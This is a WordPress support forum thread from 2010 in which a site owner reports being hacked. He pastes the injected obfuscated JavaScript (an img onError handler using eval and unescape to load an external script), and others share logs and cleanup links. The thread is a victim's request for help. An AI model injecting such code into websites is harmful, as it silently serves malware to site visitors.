Title: Malware &#8211; Code Malicious on WordPress
Last modified: August 19, 2016

---

# Malware – Code Malicious on WordPress

 *  [davex83](https://wordpress.org/support/users/davex83/)
 * (@davex83)
 * [15 years, 6 months ago](https://wordpress.org/support/topic/malware-code-malicious-on-wordpress/)
 * Yesterday my website has been attacked at code Malware:
 *     ```
       <img src="about:blank" onError='astro=unescape("%27");astru=
       unescape("%22");sksa=eval("document.getElementById("+astro+"
       seaid"+astro+").src=unescape("+astro+"%68%74%74%70%3A%2F%2F"
       +astro+")+document.getElementById("+astro+"niinnii"+astro+")
       .id+unescape("+astro+"%2E%69%6E%2F"+astro+")+"+astro+"gb"+as
       tro+"+unescape("+astro+"%2E%70%68%70"+astro+")");document.ge
       tElementById("seaid").src=sksa' style="width:300;height:300;
       border:0px;">
       ```
   
 * The version of wordpress that I was using is: 3.0 and the plugin activate are:
 * Akismet
    Author Advertising Featured Content Gallery Google XML Sitemaps IntenseDebate
   My Category Order Permalink Redirect Platinum SEO Pack Sociable **W3 Total Cache**
   Wordpress Related Post WP-PostViews WP No Category Base
 * I think that because this problem is the plugin W3 Total Cache, in fact the version
   I used was not updated yet. Now i have update to last versione W3 Total Cache
   and WordPress to last version 3.0.1.
    At the moment it seems that this code is
   no longer infected, but my hoster warned me that even after updating the plugin
   there were some infected files still.
 * Does anyone have this type of attack?
    the malicious code is present in the end
   pages wordpress.
 * Now i have deactivate the plugin w3 total cache.
    Thank You.

Viewing 9 replies - 1 through 9 (of 9 total)

 *  [mercadder](https://wordpress.org/support/users/mercadder/)
 * (@mercadder)
 * [15 years, 6 months ago](https://wordpress.org/support/topic/malware-code-malicious-on-wordpress/#post-1786817)
 * I had same problem in one of my sites. I will deactivate the W3 Total Cache now.
 * Please keep inform it…
 * Thanks!
 *  [mercadder](https://wordpress.org/support/users/mercadder/)
 * (@mercadder)
 * [15 years, 6 months ago](https://wordpress.org/support/topic/malware-code-malicious-on-wordpress/#post-1786819)
 * The Bluehost error log say this:
 * We do not authorize the use of this system to transport unsolicited, , referer:
   [http://www.dealinginabstracts.com/2009/08/09/landscape-in-crayon/](http://www.dealinginabstracts.com/2009/08/09/landscape-in-crayon/)
 * and
 * RewriteCond: NoCase option for non-regex pattern ‘-f’ is not supported and will
   be ignored.
 * etc
 *  Thread Starter [davex83](https://wordpress.org/support/users/davex83/)
 * (@davex83)
 * [15 years, 6 months ago](https://wordpress.org/support/topic/malware-code-malicious-on-wordpress/#post-1786828)
 * I wait instructions from somebody who knows and knows how to solve the problem.
   
   thank you
 *  [mercadder](https://wordpress.org/support/users/mercadder/)
 * (@mercadder)
 * [15 years, 6 months ago](https://wordpress.org/support/topic/malware-code-malicious-on-wordpress/#post-1786830)
 * I have this message in the log:
 * …..[http://docommunications.com/test/?p=3416&cpage=2&#8230](http://docommunications.com/test/?p=3416&cpage=2&#8230);..
 * This page is done in thesis theme, as some of mines.
 *  [mercadder](https://wordpress.org/support/users/mercadder/)
 * (@mercadder)
 * [15 years, 6 months ago](https://wordpress.org/support/topic/malware-code-malicious-on-wordpress/#post-1786831)
 * Now this:
 * [Fri Nov 26 12:52:48 2010] [warn] RSA server certificate CommonName (CN) `www.
   ymcagc.org’ does NOT match server name!?
    [Fri Nov 26 12:52:48 2010] [warn] RSA
   server certificate CommonName (CN) `www.oringsusa.com’ does NOT match server 
   name!? [Fri Nov 26 12:52:48 2010] [warn] RSA server certificate CommonName (CN)`
   www.jamessmithseries.net’ does NOT match server name!?
 * _[List moderated as per the [Forum Rules](http://codex.wordpress.org/Forum_Welcome).]_
 *  [esmi](https://wordpress.org/support/users/esmi/)
 * (@esmi)
 * [15 years, 6 months ago](https://wordpress.org/support/topic/malware-code-malicious-on-wordpress/#post-1786853)
 * [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
   
   [http://wordpress.org/support/topic/268083#post-1065779](http://wordpress.org/support/topic/268083#post-1065779)
   [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
   [http://ottopress.com/2009/hacked-wordpress-backdoors/](http://ottopress.com/2009/hacked-wordpress-backdoors/)
 *  [mercadder](https://wordpress.org/support/users/mercadder/)
 * (@mercadder)
 * [15 years, 6 months ago](https://wordpress.org/support/topic/malware-code-malicious-on-wordpress/#post-1786887)
 * I´ve wrote a ticket to Bluehost, and they said everything is perfect.
 * 🙂
 *  [mercadder](https://wordpress.org/support/users/mercadder/)
 * (@mercadder)
 * [15 years, 6 months ago](https://wordpress.org/support/topic/malware-code-malicious-on-wordpress/#post-1786888)
 * Thank you esmi!
 *  [Frederick Townes](https://wordpress.org/support/users/fredericktownes/)
 * (@fredericktownes)
 * [15 years, 5 months ago](https://wordpress.org/support/topic/malware-code-malicious-on-wordpress/#post-1786955)
 * Can someone please explain to me what W3TC has to do with this issue? 🙂

Viewing 9 replies - 1 through 9 (of 9 total)

The topic ‘Malware – Code Malicious on WordPress’ is closed to new replies.

 * 9 replies
 * 4 participants
 * Last reply from: [Frederick Townes](https://wordpress.org/support/users/fredericktownes/)
 * Last activity: [15 years, 5 months ago](https://wordpress.org/support/topic/malware-code-malicious-on-wordpress/#post-1786955)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics
